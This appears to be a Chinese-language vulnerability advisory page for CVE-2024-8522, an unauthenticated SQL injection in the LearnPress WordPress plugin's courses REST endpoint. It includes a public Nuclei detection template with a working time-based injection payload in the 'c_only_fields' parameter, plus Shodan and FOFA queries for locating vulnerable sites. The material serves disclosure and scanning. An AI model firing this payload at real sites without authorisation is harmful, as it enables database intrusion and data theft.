CVE-2024-8522: LearnPress < 4.2.7.1 - SQL Injection

日期: 2025-08-01 | 影响软件: LearnPress | POC: 已公开

漏洞描述

The LearnPress - WordPress LMS Plugin plugin for WordPress is vulnerable to SQL Injection via the 'c_only_fields' parameter of the /wp-json/learnpress/v1/courses REST API endpoint in all versions up to, and including, 4.2.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

PoC代码[已公开]

id: CVE-2024-8522

info:
  name: LearnPress < 4.2.7.1 - SQL Injection
  author: pdresearch,iamnoooob,rootxharsh
  severity: critical
  description: |
    The LearnPress - WordPress LMS Plugin plugin for WordPress is vulnerable to SQL Injection via the 'c_only_fields' parameter of the /wp-json/learnpress/v1/courses REST API endpoint in all versions up to, and including, 4.2.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
  reference:
    - https://github.com/advisories/GHSA-3w3r-r6g6-w8x5
    - https://nvd.nist.gov/vuln/detail/CVE-2024-8522
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-8522
    cwe-id: CWE-89
    epss-score: 0.83001
    epss-percentile: 0.99214
    cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 4
    vendor: thimpress
    product: learnpress
    shodan-query: html:"/wp-content/plugins/learnpress"
    fofa-query: body="/wp-content/plugins/learnpress"
  tags: time-based-sqli,cve,cve2024,learnpress,sqli,wp,wordpress,wp-plugin,vkev

http:
  - raw:
      - |
        @timeout: 30s
        GET /wp-json/learnpress/v1/courses?course_filter=&c_only_fields=post_title,(select(sleep(6))),ID& HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "duration>=6"
          - "contains(content_type, 'application/json')"
          - contains_all(body, 'id\":', 'name\":')
        condition: and
# digest: 490a0046304402201100a74386aca0b0fd60f3ee497f46a16c0dbe10c98a0a342a724ffb7edf6bbe022056382a96a413e129f1b2455f564ca0614aad4919a48c1fa606a015aacb33da04:922c64590222798bb761d5b6d8e72950

相关漏洞推荐